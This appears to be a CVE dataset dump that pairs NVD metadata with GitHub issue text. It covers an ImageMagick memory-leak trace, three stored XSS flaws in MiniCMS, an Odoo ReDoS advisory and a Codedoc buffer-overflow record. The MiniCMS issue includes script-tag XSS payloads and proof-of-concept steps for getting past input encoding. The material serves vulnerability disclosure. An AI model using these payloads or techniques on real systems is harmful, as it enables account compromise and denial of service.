0x7f12112ce980 in CombineImages MagickCore/channel.c:523:7 #9 0x7f1210cfc574 in CLIListOperatorImages MagickWand/operation.c:3848:22 #10 0x7f1210d0839e in CLIOption MagickWand/operation.c:5282:14 #11 0x7f1210b49a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #12 0x7f1210b4ad0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #13 0x7f1210b94ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #14 0x526f95 in MagickMain utilities/magick.c:149:10 #15 0x5268e1 in main utilities/magick.c:180:10 #16 0x7f120b60bb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 Indirect leak of 64 byte(s) in 1 object(s) allocated from: #0 0x4e6200 in posix_memalign (install/bin/magick+0x4e6200) #1 0x7f121156ea36 in AcquireAlignedMemory MagickCore/memory.c:265:7 #2 0x7f12112a1cb2 in AcquirePixelCacheNexus MagickCore/cache.c:267:29 #3 0x7f12112a175d in AcquirePixelCache MagickCore/cache.c:212:26 #4 0x7f12112a275d in ClonePixelCache MagickCore/cache.c:515:28 #5 0x7f12112bcf3b in GetImagePixelCache MagickCore/cache.c:1724:29 #6 0x7f12112c35b9 in SyncImagePixelCache MagickCore/cache.c:5499:28 #7 0x7f12115222c1 in SetImageStorageClass MagickCore/image.c:2627:10 #8 0x7f12112ce980 in CombineImages MagickCore/channel.c:523:7 #9 0x7f1210cfc574 in CLIListOperatorImages MagickWand/operation.c:3848:22 #10 0x7f1210d0839e in CLIOption MagickWand/operation.c:5282:14 #11 0x7f1210b49a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #12 0x7f1210b4ad0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #13 0x7f1210b94ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #14 0x526f95 in MagickMain utilities/magick.c:149:10 #15 0x5268e1 in main utilities/magick.c:180:10 #16 0x7f120b60bb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 Indirect leak of 64 byte(s) in 1 object(s) allocated from: #0 0x4e6200 in posix_memalign (install/bin/magick+0x4e6200) #1 0x7f12116b4521 in AcquireSemaphoreMemory MagickCore/semaphore.c:154:7 #2 0x7f12116b3d63 in AcquireSemaphoreInfo MagickCore/semaphore.c:200:36 #3 0x7f12115213df in CloneImage MagickCore/image.c:871:26 #4 0x7f12112ce94b in CombineImages MagickCore/channel.c:520:17 #5 0x7f1210cfc574 in CLIListOperatorImages MagickWand/operation.c:3848:22 #6 0x7f1210d0839e in CLIOption MagickWand/operation.c:5282:14 #7 0x7f1210b49a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #8 0x7f1210b4ad0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #9 0x7f1210b94ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #10 0x526f95 in MagickMain utilities/magick.c:149:10 #11 0x5268e1 in main utilities/magick.c:180:10 #12 0x7f120b60bb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 Indirect leak of 64 byte(s) in 1 object(s) allocated from: #0 0x4e6200 in posix_memalign (install/bin/magick+0x4e6200) #1 0x7f12116b4521 in AcquireSemaphoreMemory MagickCore/semaphore.c:154:7 #2 0x7f12116b3d63 in AcquireSemaphoreInfo MagickCore/semaphore.c:200:36 #3 0x7f1211280a9e in GetBlobInfo MagickCore/blob.c:1745:24 #4 0x7f121128065a in CloneBlobInfo MagickCore/blob.c:555:3 #5 0x7f1211521248 in CloneImage MagickCore/image.c:867:25 #6 0x7f12112ce94b in CombineImages MagickCore/channel.c:520:17 #7 0x7f1210cfc574 in CLIListOperatorImages MagickWand/operation.c:3848:22 #8 0x7f1210d0839e in CLIOption MagickWand/operation.c:5282:14 #9 0x7f1210b49a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #10 0x7f1210b4ad0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #11 0x7f1210b94ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #12 0x526f95 in MagickMain utilities/magick.c:149:10 #13 0x5268e1 in main utilities/magick.c:180:10 #14 0x7f120b60bb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 Indirect leak of 64 byte(s) in 1 object(s) allocated from: #0 0x4e6200 in posix_memalign (install/bin/magick+0x4e6200) #1 0x7f12116b4521 in AcquireSemaphoreMemory MagickCore/semaphore.c:154:7 #2 0x7f12116b3d63 in AcquireSemaphoreInfo MagickCore/semaphore.c:200:36 #3 0x7f12116cb129 in NewSplayTree MagickCore/splay-tree.c:1159:25 #4 0x7f12116caac4 in CloneSplayTree MagickCore/splay-tree.c:360:14 #5 0x7f1211272c4a in CloneImageArtifacts MagickCore/artifact.c:118:24 #6 0x7f12115209ac in CloneImage MagickCore/image.c:840:10 #7 0x7f12112ce94b in CombineImages MagickCore/channel.c:520:17 #8 0x7f1210cfc574 in CLIListOperatorImages MagickWand/operation.c:3848:22 #9 0x7f1210d0839e in CLIOption MagickWand/operation.c:5282:14 #10 0x7f1210b49a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #11 0x7f1210b4ad0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #12 0x7f1210b94ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #13 0x526f95 in MagickMain utilities/magick.c:149:10 #14 0x5268e1 in main utilities/magick.c:180:10 #15 0x7f120b60bb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 Indirect leak of 64 byte(s) in 1 object(s) allocated from: #0 0x4e6200 in posix_memalign (install/bin/magick+0x4e6200) #1 0x7f12116b4521 in AcquireSemaphoreMemory MagickCore/semaphore.c:154:7 #2 0x7f12116b3d63 in AcquireSemaphoreInfo MagickCore/semaphore.c:200:36 #3 0x7f12116cb129 in NewSplayTree MagickCore/splay-tree.c:1159:25 #4 0x7f12116caac4 in CloneSplayTree MagickCore/splay-tree.c:360:14 #5 0x7f12115ff9f3 in CloneImageProperties MagickCore/property.c:196:25 #6 0x7f1211520999 in CloneImage MagickCore/image.c:839:10 #7 0x7f12112ce94b in CombineImages MagickCore/channel.c:520:17 #8 0x7f1210cfc574 in CLIListOperatorImages MagickWand/operation.c:3848:22 #9 0x7f1210d0839e in CLIOption MagickWand/operation.c:5282:14 #10 0x7f1210b49a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #11 0x7f1210b4ad0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #12 0x7f1210b94ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #13 0x526f95 in MagickMain utilities/magick.c:149:10 #14 0x5268e1 in main utilities/magick.c:180:10 #15 0x7f120b60bb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 Indirect leak of 64 byte(s) in 1 object(s) allocated from: #0 0x4e6200 in posix_memalign (install/bin/magick+0x4e6200) #1 0x7f12116b4521 in AcquireSemaphoreMemory MagickCore/semaphore.c:154:7 #2 0x7f12116b3d63 in AcquireSemaphoreInfo MagickCore/semaphore.c:200:36 #3 0x7f12116cb129 in NewSplayTree MagickCore/splay-tree.c:1159:25 #4 0x7f12116caac4 in CloneSplayTree MagickCore/splay-tree.c:360:14 #5 0x7f12115a03d0 in CloneImageOptions MagickCore/option.c:2144:27 #6 0x7f1211528a58 in CloneImageInfo MagickCore/image.c:1010:10 #7 0x7f121151e0b8 in SyncImageSettings MagickCore/image.c:4242:21 #8 0x7f12115358a6 in SyncImagesSettings MagickCore/image.c:4000:12 #9 0x7f1210d081a3 in CLIOption MagickWand/operation.c:5249:14 #10 0x7f1210b49a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #11 0x7f1210b4ad0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #12 0x7f1210b94ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #13 0x526f95 in MagickMain utilities/magick.c:149:10 #14 0x5268e1 in main utilities/magick.c:180:10 #15 0x7f120b60bb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 Indirect leak of 64 byte(s) in 1 object(s) allocated from: #0 0x4e6200 in posix_memalign (install/bin/magick+0x4e6200) #1 0x7f12116b4521 in AcquireSemaphoreMemory MagickCore/semaphore.c:154:7 #2 0x7f12116b3d63 in AcquireSemaphoreInfo MagickCore/semaphore.c:200:36 #3 0x7f12112a1b53 in AcquirePixelCache MagickCore/cache.c:231:30 #4 0x7f12112a275d in ClonePixelCache MagickCore/cache.c:515:28 #5 0x7f12112bcf3b in GetImagePixelCache MagickCore/cache.c:1724:29 #6 0x7f12112c35b9 in SyncImagePixelCache MagickCore/cache.c:5499:28 #7 0x7f12115222c1 in SetImageStorageClass MagickCore/image.c:2627:10 #8 0x7f12112ce980 in CombineImages MagickCore/channel.c:523:7 #9 0x7f1210cfc574 in CLIListOperatorImages MagickWand/operation.c:3848:22 #10 0x7f1210d0839e in CLIOption MagickWand/operation.c:5282:14 #11 0x7f1210b49a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #12 0x7f1210b4ad0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #13 0x7f1210b94ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #14 0x526f95 in MagickMain utilities/magick.c:149:10 #15 0x5268e1 in main utilities/magick.c:180:10 #16 0x7f120b60bb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 Indirect leak of 46 byte(s) in 4 object(s) allocated from: #0 0x4e5397 in malloc (install/bin/magick+0x4e5397) #1 0x7f121156ec16 in AcquireMagickMemory MagickCore/memory.c:478:10 #2 0x7f121156ec7f in AcquireQuantumMemory MagickCore/memory.c:551:10 #3 0x7f12117027c3 in ConstantString MagickCore/string.c:713:26 #4 0x7f12116cacc6 in CloneSplayTree MagickCore/splay-tree.c:373:7 #5 0x7f12115a03d0 in CloneImageOptions MagickCore/option.c:2144:27 #6 0x7f1211528a58 in CloneImageInfo MagickCore/image.c:1010:10 #7 0x7f121151e0b8 in SyncImageSettings MagickCore/image.c:4242:21 #8 0x7f12115358a6 in SyncImagesSettings MagickCore/image.c:4000:12 #9 0x7f1210d081a3 in CLIOption MagickWand/operation.c:5249:14 #10 0x7f1210b49a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #11 0x7f1210b4ad0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #12 0x7f1210b94ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #13 0x526f95 in MagickMain utilities/magick.c:149:10 #14 0x5268e1 in main utilities/magick.c:180:10 #15 0x7f120b60bb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 Indirect leak of 38 byte(s) in 4 object(s) allocated from: #0 0x4e5397 in malloc (install/bin/magick+0x4e5397) #1 0x7f121156ec16 in AcquireMagickMemory MagickCore/memory.c:478:10 #2 0x7f121156ec7f in AcquireQuantumMemory MagickCore/memory.c:551:10 #3 0x7f12117027c3 in ConstantString MagickCore/string.c:713:26 #4 0x7f12116cac41 in CloneSplayTree MagickCore/splay-tree.c:372:43 #5 0x7f12115ff9f3 in CloneImageProperties MagickCore/property.c:196:25 #6 0x7f1211520999 in CloneImage MagickCore/image.c:839:10 #7 0x7f12112ce94b in CombineImages MagickCore/channel.c:520:17 #8 0x7f1210cfc574 in CLIListOperatorImages MagickWand/operation.c:3848:22 #9 0x7f1210d0839e in CLIOption MagickWand/operation.c:5282:14 #10 0x7f1210b49a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #11 0x7f1210b4ad0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #12 0x7f1210b94ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #13 0x526f95 in MagickMain utilities/magick.c:149:10 #14 0x5268e1 in main utilities/magick.c:180:10 #15 0x7f120b60bb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 Indirect leak of 29 byte(s) in 4 object(s) allocated from: #0 0x4e5397 in malloc (install/bin/magick+0x4e5397) #1 0x7f121156ec16 in AcquireMagickMemory MagickCore/memory.c:478:10 #2 0x7f121156ec7f in AcquireQuantumMemory MagickCore/memory.c:551:10 #3 0x7f12117027c3 in ConstantString MagickCore/string.c:713:26 #4 0x7f12116cac41 in CloneSplayTree MagickCore/splay-tree.c:372:43 #5 0x7f12115a03d0 in CloneImageOptions MagickCore/option.c:2144:27 #6 0x7f1211528a58 in CloneImageInfo MagickCore/image.c:1010:10 #7 0x7f121151e0b8 in SyncImageSettings MagickCore/image.c:4242:21 #8 0x7f12115358a6 in SyncImagesSettings MagickCore/image.c:4000:12 #9 0x7f1210d081a3 in CLIOption MagickWand/operation.c:5249:14 #10 0x7f1210b49a99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #11 0x7f1210b4ad0a in MagickImageCommand MagickWand/magick-cli.c:796:5 #12 0x7f1210b94ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14 #13 0x526f95 in MagickMain utilities/magick.c:149:10 #14 0x5268e1 in main utilities/magick.c:180:10 #15 0x7f120b60bb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 SUMMARY: AddressSanitizer: 3746948 byte(s) leaked in 43 allocation(s). ``` ### System Configuration <!-- Tell us about the environment where you are experiencing the bug --> - ImageMagick version: ImageMagick 7.0.8-52 Q16 x86_64 2019-07-02 https://imagemagick.org - Environment (Operating system, version and so on): Description: Ubuntu 18.04.1 LTS Release: 18.04 Codename: bionic - Additional information: CC=clang-7 CXX=clang++-7 ./configure --disable-openmp --without-png and I also tested on Ubuntu 16.04 with clang-3.8 and gcc-5. <!-- Thanks for reporting the issue to ImageMagick! -->
memory leaks is detected at AcquireMagickMemory
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1623/comments
3
2019-07-01T18:19:43Z
2019-07-08T10:31:06Z
https://github.com/ImageMagick/ImageMagick/issues/1623
462,846,647
1,623
501
CVE-2019-13339
2019-07-05T15:16:21.967
In MiniCMS V1.10, stored XSS was found in mc-admin/page-edit.php (content box), which can be used to get a user's cookie.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.0" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV31": null, "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Mailing List", "Third Party Advisory" ], "url": "https://github.com/bg5sbk/MiniCMS/issues/32" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Mailing List", "Third Party Advisory" ], "url": "https://github.com/bg5sbk/MiniCMS/issues/32" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:1234n:minicms:1.10:*:*:*:*:*:*:*", "matchCriteriaId": "1EAC73A0-FD32-4344-A4F5-BB6D3D1B7DA7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/bg5sbk/MiniCMS/issues/32
[ "Issue Tracking", "Mailing List", "Third Party Advisory" ]
github.com
[ "bg5sbk", "MiniCMS" ]
Three stored XSSes were found, and all of them have not been found before. And the first one is similar to the third one, but the first one is in post-edit page while the other in page-edit page. ### Stored XSS 1: In /MiniCMS/mc-admin/post-edit.php Payload:<script>alert(document.domain)</script> **POC:** 1. Go to the article edit page, input payload into the content box: ![XSS1-1](https://user-images.githubusercontent.com/52525833/60695155-545bad00-9f13-11e9-861e-3b7b1410f8c2.png) 2. Use burpsuite and edit the payload(the frontstage will encode the payload): ![XSS1-2](https://user-images.githubusercontent.com/52525833/60695157-59b8f780-9f13-11e9-9e6a-21586263978c.png) 3. After that, tern to the article page: ![XSS1-3](https://user-images.githubusercontent.com/52525833/60695161-60e00580-9f13-11e9-9d54-d6036b1355bd.png) 4. Then you get the window popped with the domain: ![XSS1-4](https://user-images.githubusercontent.com/52525833/60695172-663d5000-9f13-11e9-98ea-cbaea80094f1.png) ### Stored XSS 2: In/MiniCMS/mc-admin/conf.php Payload:<script>alert("2:"+document.domain)</script> **POC:** 1. Enter config page ![XSS2-1](https://user-images.githubusercontent.com/52525833/60659132-3a748880-9e87-11e9-834f-ec6b1ec8f668.png) 2. Upload the payload in comment ![XSS2-2](https://user-images.githubusercontent.com/52525833/60659147-44968700-9e87-11e9-9971-5045dab98021.png) 3. Then write an article and set the comment code into true and save ![XSS2-3](https://user-images.githubusercontent.com/52525833/60659152-495b3b00-9e87-11e9-9763-9173d644ae66.png) 4. When someone is reading the article, awindowwillpopwiththedomain ![XSS2-4](https://user-images.githubusercontent.com/52525833/60659154-4bbd9500-9e87-11e9-80bc-4da299c90d27.png) ### Stored XSS 3: Payload:<script>alert("3: "+document.domain)</script> In /MiniCMS/mc-admin/page-edit.php **POC:** 1. Go to the page-edit page and input the payload into the content box ,click save button : ![XSS3-1](https://user-images.githubusercontent.com/52525833/60695317-e5cb1f00-9f13-11e9-8a06-5d5e574fab94.png) 2.Use burpsuite to edit the payload. Pay attention that the “+” needs to be url-encoded: ![XSS3-2](https://user-images.githubusercontent.com/52525833/60695322-e95ea600-9f13-11e9-8ab1-d531ad8616da.png) 3.After that, go to the page we have saved: ![XSS3-3](https://user-images.githubusercontent.com/52525833/60695331-ecf22d00-9f13-11e9-8fe8-896259d6286a.png) 4.Window will pop with the domain: ![XSS3-4](https://user-images.githubusercontent.com/52525833/60695332-f085b400-9f13-11e9-804b-92967d6b3402.png)
3 XSSes found
https://api.github.com/repos/bg5sbk/MiniCMS/issues/32/comments
0
2019-07-04T10:12:43Z
2021-07-19T17:49:41Z
https://github.com/bg5sbk/MiniCMS/issues/32
464,184,127
32
502
CVE-2018-14733
2019-07-05T20:15:13.907
The Odoo Community Association (OCA) dbfilter_from_header module makes Odoo 8.x, 9.x, 10.x, and 11.x vulnerable to ReDoS (regular expression denial of service) under certain circumstances.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV31": null, "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Mitigation", "Third Party Advisory" ], "url": "https://github.com/OCA/server-tools/issues/1335" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/OCA/server-tools/tree/10.0/dbfilter_from_header" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/OCA/server-tools/tree/11.0/dbfilter_from_header" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/OCA/server-tools/tree/8.0/dbfilter_from_header" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/OCA/server-tools/tree/9.0/dbfilter_from_header" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mitigation", "Third Party Advisory" ], "url": "https://github.com/OCA/server-tools/issues/1335" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/OCA/server-tools/tree/10.0/dbfilter_from_header" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/OCA/server-tools/tree/11.0/dbfilter_from_header" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/OCA/server-tools/tree/8.0/dbfilter_from_header" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/OCA/server-tools/tree/9.0/dbfilter_from_header" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:odoo:odoo:8.0:*:*:*:community:*:*:*", "matchCriteriaId": "705E446A-98DC-43D6-905A-F52E3FDCAF48", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:odoo:odoo:8.0:*:*:*:enterprise:*:*:*", "matchCriteriaId": "F8E37238-5C5A-41E4-8D46-48446E539277", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:odoo:odoo:9.0:*:*:*:community:*:*:*", "matchCriteriaId": "C3F9E8F1-FAF7-44AE-8D05-BE717D247EDE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:odoo:odoo:9.0:*:*:*:enterprise:*:*:*", "matchCriteriaId": "167C709E-C8B2-4CCB-963E-E1D8C664190A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:odoo:odoo:10.0:*:*:*:community:*:*:*", "matchCriteriaId": "C52F2EEB-11E5-49E8-AD06-3014FF2C2D24", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:odoo:odoo:10.0:*:*:*:enterprise:*:*:*", "matchCriteriaId": "A4405E54-6C16-49D5-B632-3D72091B2FEB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:odoo:odoo:11.0:*:*:*:community:*:*:*", "matchCriteriaId": "38424B03-4121-4A79-8E4E-4CB4DCD3E4A5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:odoo:odoo:11.0:*:*:*:enterprise:*:*:*", "matchCriteriaId": "1298CF62-A06E-48AD-8141-0541DE3F6381", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "20" ]
20
https://github.com/OCA/server-tools/issues/1335
[ "Mitigation", "Third Party Advisory" ]
github.com
[ "OCA", "server-tools" ]
# Security Advisory (OCA-2018-08-08-1) ## Denial of Service via `dbfilter_from_header` **Affects:** Odoo 8.0, 9.0, 10.0, 11.0 servers: - having `dbfilter_from_header` module available in the addons path - being directly accessible OR missing the expected configuration at the reverse proxy level (nginx) **Credits**: Nils Hamerlinck (Trobz) **CVE-ID**: [CVE-2018-14733](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14733) ## I. Background [`dbfilter_from_header`](https://github.com/OCA/server-tools/tree/11.0/dbfilter_from_header) module from [OCA's `server-tools` repository](https://github.com/OCA/server-tools) allows to take into account a specific HTTP header in the request (`X-Odoo-dbfilter` or `X-Openerp-dbfilter`, depending on the version) to define the [dbfilter](https://www.odoo.com/documentation/11.0/setup/deploy.html) applying to the instance. This is useful when you have one instance with multiple databases whose names don't match with the target domain names. ## II. Problem Description In a normal use case this HTTP header is set by the system administrator at the reverse proxy level (nginx); module is added to the `server_wide_modules` config parameter and installed. But the module contains a `static/` directory, which had the [unexpected effect](https://github.com/odoo/odoo/pull/8591) of trigerring its inconditional loading, even when not intended to be used: not added to the `server_wide_modules` nor installed. ## III. Impact *Attack Vector*: Network exploitable *Authentication*: Not Required *CVSS3 Score*: High :: 7.5 [AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C) So by just having it available in its addons path, the instance would load `dbfilter_from_header`. An attacker could define a `X-Odoo-dbfilter` / `X-Openerp-dbfilter` header that would be [evaluated as the db_filter regular expression](https://github.com/OCA/server-tools/blob/da953fd29dcb838dbd848a6a03cb64a9e6280789/dbfilter_from_header/__init__.py#L22). By crafting a voluntarily inefficient regular expression, he could lead Odoo to DoS (aka "ReDoS"): - in threaded mode, with one request; - in multi-workers mode, with one request per worker (that would process until `limit_time_cpu`). ## IV. Workaround - If your Odoo server is accessible directly without any reverse proxy, there is no workaround. Note that using a reverse proxy is [highly recommended](https://www.odoo.com/documentation/11.0/setup/deploy.html) for security but also performances reasons. - If your Odoo server is running behind a reverse proxy, configure it at least to set the `X-Odoo-dbfilter` header to `.*` (or any relevant stricter regex for the concerned host): - nginx: `proxy_set_header X-Odoo-dbfilter ^.*\Z;` - others: see [here](https://github.com/OCA/server-tools/blob/11.0/dbfilter_from_header/README.rst#configuration) ## V. Solution - Update `dbfilter_from_header` source code. - If you intend to use this module in a deployment, make sure that: - proxy mode is enabled in Odoo's configuration file: `proxy_mode = True` - a `X-Odoo-dbfilter` header is properly defined at reverse proxy level - module is added to `server_wide_modules` ## VI. Correction details The following list contains the revisions after which the vulnerability is corrected: - 8.0: [462317](https://github.com/OCA/server-tools/commit/462317d49e2e4992bb9eb62d5718d9cbe79220f2) - 9.0: [fa6124](https://github.com/OCA/server-tools/commit/fa61245363b10bbe59c0354cf954c4694893b2d4) - 10.0: [16e9bf](https://github.com/OCA/server-tools/commit/16e9bf1d401270e94b09634e394cde99cc6069e1) - 11.0: [2602f5](https://github.com/OCA/server-tools/commit/2602f5934f7be43c1a748c4d890550a7213e40b8)
[SEC] OCA-2018-08-08-1 - Denial of Service via dbfilter_from_header
https://api.github.com/repos/OCA/server-tools/issues/1335/comments
2
2018-08-08T07:56:44Z
2018-08-10T20:12:49Z
https://github.com/OCA/server-tools/issues/1335
348,615,432
1,335
503
CVE-2019-13362
2019-07-06T21:15:10.923
Codedoc v3.2 has a stack-based buffer overflow in add_variable in codedoc.c, related to codedoc_strlcpy.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV31": null, "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/codedoc/issues/5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/michaelrsweet/codedoc/issues/5" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:codedoc_project:codedoc:3.2:*:*:*:*:*:*:*", "matchCriteriaId": "844D2DED-B3E1-4C02-A345-40DA9770B78A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
